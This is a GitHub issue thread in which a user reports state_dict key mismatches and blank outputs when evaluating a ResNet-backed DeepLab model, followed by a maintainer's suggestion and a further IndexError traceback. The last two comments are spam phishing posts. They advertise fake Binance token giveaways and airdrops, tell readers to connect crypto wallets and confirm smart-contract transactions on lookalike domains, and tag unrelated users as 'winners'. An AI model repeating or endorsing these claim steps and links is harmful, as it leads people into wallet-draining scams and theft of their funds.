### ISSUE TITLE
RuntimeError: Error(s) in loading state_dict for DeepLab: 	Unexpected key(s)

### ISSUE THREAD

**Issue by SAIVENKATARAJU** [sunggukcha/deeplabs#7]
Hi i am getting unexpected keys(s) while running the below command.

``bs=1``
``backbone='resnet'``
``dataset='bdd'``
``model='deeplabv3+'``
``norm='gn'``
``save_dir='./prd'``
``resume='/home/ubuntu/deeplabs/resenet152.h5'``
``rm -rf $save_dir``
``mkdir $save_dir``
``python evaluate.py --backbone $backbone --dataset $dataset --model $model --norm $norm --save-dir $save_dir --batch-size $bs --resume $resume --test
``

``Unexpected key(s) in state_dict: "backbone.layer2.4.conv1.weight", "backbone.layer2.4.bn1.weight", "backbone.layer2.4.bn1.bias", "backbone.layer2.4.conv2.weight", "backbone.layer2.4.bn2.weight", "backbone.layer2.4.bn2.bias", "backbone.layer2.4.conv3.weight", "backbone.layer2.4.bn3.weight", "backbone.layer2.4.bn3.bias", "backbone.layer2.5.conv1.weight", "backbone.layer2.5.bn1.weight", "backbone.layer2.5.bn1.bias", "backbone.layer2.5.conv2.weight", "backbone.layer2.5.bn2.weight", "backbone.layer2.5.bn2.bias", "backbone.layer2.5.conv3.weight", "backbone.layer2.5.bn3.weight", "backbone.layer2.5.bn3.bias", "backbone.layer2.6.conv1.weight", "backbone.layer2.6.bn1.weight", "backbone.layer2.6.bn1.bias", "backbone.layer2.6.conv2.weight", "backbone.layer2.6.bn2.weight", "backbone.layer2.6.bn2.bias", "backbone.layer2.6.conv3.weight", "backbone.layer2.6.bn3.weight", "backbone.layer2.6.bn3.bias", "backbone.layer2.7.conv1.weight", "backbone.layer2.7.bn1.weight", "backbone.layer2.7.bn1.bias", "backbone.layer2.7.conv2.weight", "backbone.layer2.7.bn2.weight", "backbone.layer2.7.bn2.bias", "backbone.layer2.7.conv3.weight", "backbone.layer2.7.bn3.weight", "backbone.layer2.7.bn3.bias", "backbone.layer3.23.conv1.weight", "backbone.layer3.23.bn1.weight", "backbone.layer3.23.bn1.bias", "backbone.layer3.23.conv2.weight", "backbone.layer3.23.bn2.weight", "backbone.layer3.23.bn2.bias", "backbone.layer3.23.conv3.weight", "backbone.layer3.23.bn3.weight", "backbone.layer3.23.bn3.bias", "backbone.layer3.24.conv1.weight", "backbone.layer3.24.bn1.weight", "backbone.layer3.24.bn1.bias", "backbone.layer3.24.conv2.weight", "backbone.layer3.24.bn2.weight", "backbone.layer3.24.bn2.bias", "backbone.layer3.24.conv3.weight", "backbone.layer3.24.bn3.weight", "backbone.layer3.24.bn3.bias", "backbone.layer3.25.conv1.weight", "backbone.layer3.25.bn1.weight", "backbone.layer3.25.bn1.bias", "backbone.layer3.25.conv2.weight", "backbone.layer3.25.bn2.weight", "backbone.layer3.25.bn2.bias", "backbone.layer3.25.conv3.weight", "backbone.layer3.25.bn3.weight", "backbone.layer3.25.bn3.bias", "backbone.layer3.26.conv1.weight", "backbone.layer3.26.bn1.weight", "backbone.layer3.26.bn1.bias", "backbone.layer3.26.conv2.weight", "backbone.layer3.26.bn2.weight", "backbone.layer3.26.bn2.bias", "backbone.layer3.26.conv3.weight", "backbone.layer3.26.bn3.weight", "backbone.layer3.26.bn3.bias", "backbone.layer3.27.conv1.weight", "backbone.layer3.27.bn1.weight", "backbone.layer3.27.bn1.bias", "backbone.layer3.27.conv2.weight", "backbone.layer3.27.bn2.weight", "backbone.layer3.27.bn2.bias", "backbone.layer3.27.conv3.weight", "backbone.layer3.27.bn3.weight", "backbone.layer3.27.bn3.bias", "backbone.layer3.28.conv1.weight", "backbone.layer3.28.bn1.weight", "backbone.layer3.28.bn1.bias", "backbone.layer3.28.conv2.weight", "backbone.layer3.28.bn2.weight", "backbone.layer3.28.bn2.bias", "backbone.layer3.28.conv3.weight", "backbone.layer3.28.bn3.weight", "backbone.layer3.28.bn3.bias", "backbone.layer3.29.conv1.weight", "backbone.layer3.29.bn1.weight", "backbone.layer3.29.bn1.bias", "backbone.layer3.29.conv2.weight", "backbone.layer3.29.bn2.weight", "backbone.layer3.29.bn2.bias", "backbone.layer3.29.conv3.weight", "backbone.layer3.29.bn3.weight", "backbone.layer3.29.bn3.bias", "backbone.layer3.30.conv1.weight", "backbone.layer3.30.bn1.weight", "backbone.layer3.30.bn1.bias", "backbone.layer3.30.conv2.weight", "backbone.layer3.30.bn2.weight", "backbone.layer3.30.bn2.bias", "backbone.layer3.30.conv3.weight", "backbone.layer3.30.bn3.weight", "backbone.layer3.30.bn3.bias", "backbone.layer3.31.conv1.weight", "backbone.layer3.31.bn1.weight", "backbone.layer3.31.bn1.bias", "backbone.layer3.31.conv2.weight", "backbone.layer3.31.bn2.weight", "backbone.layer3.31.bn2.bias", "backbone.layer3.31.conv3.weight", "backbone.layer3.31.bn3.weight", "backbone.layer3.31.bn3.bias", "backbone.layer3.32.conv1.weight", "backbone.layer3.32.bn1.weight", "backbone.layer3.32.bn1.bias", "backbone.layer3.32.conv2.weight", "backbone.layer3.32.bn2.weight", "backbone.layer3.32.bn2.bias", "backbone.layer3.32.conv3.weight", "backbone.layer3.32.bn3.weight", "backbone.layer3.32.bn3.bias", "backbone.layer3.33.conv1.weight", "backbone.layer3.33.bn1.weight", "backbone.layer3.33.bn1.bias", "backbone.layer3.33.conv2.weight", "backbone.layer3.33.bn2.weight", "backbone.layer3.33.bn2.bias", "backbone.layer3.33.conv3.weight", "backbone.layer3.33.bn3.weight", "backbone.layer3.33.bn3.bias", "backbone.layer3.34.conv1.weight", "backbone.layer3.34.bn1.weight", "backbone.layer3.34.bn1.bias", "backbone.layer3.34.conv2.weight", "backbone.layer3.34.bn2.weight", "backbone.layer3.34.bn2.bias", "backbone.layer3.34.conv3.weight", "backbone.layer3.34.bn3.weight", "backbone.layer3.34.bn3.bias", "backbone.layer3.35.conv1.weight", "backbone.layer3.35.bn1.weight", "backbone.layer3.35.bn1.bias", "backbone.layer3.35.conv2.weight", "backbone.layer3.35.bn2.weight", "backbone.layer3.35.bn2.bias", "backbone.layer3.35.conv3.weight", "backbone.layer3.35.bn3.weight", "backbone.layer3.35.bn3.bias". ```

**Comment by SAIVENKATARAJU** [comment]
If i use strict=False,  in **self.model.module.load_state_dict** i am getting completely blank images in prd folder.

**Comment by sunggukcha** [comment]
Try to use *--color* argument as well. You may see coloured (image + prediction combined) image.

**Comment by SAIVENKATARAJU** [comment]
Hi Thanks for Your reply.

I am getting the following error if i used --color argument

``Traceback (most recent call last):``
 `` File "evaluate.py", line 307, in <module>``
   `` main()``
  ``File "evaluate.py", line 302, in main``
   `` trainer.test()``
  ``File "evaluate.py", line 144, in test``
   `` self.vs.predict_color(preds, images, names, self.args.save_dir)``
``  File "/home/ubuntu/deeplabs/utils/visualize.py", line 107, in predict_color``
``    result[pred==0] = origin[pred==0]``
``IndexError: boolean index did not match indexed array along dimension 0; dimension is 168 but corresponding boolean dimension is 300``

**Comment by gqgserver** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=Github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=Github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*

**Comment by rajiur007** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @kaichen, @B3ns44d, @makesmallprogresseveryday, @isgasho, @luiscm88, @reaink, @gregdhill
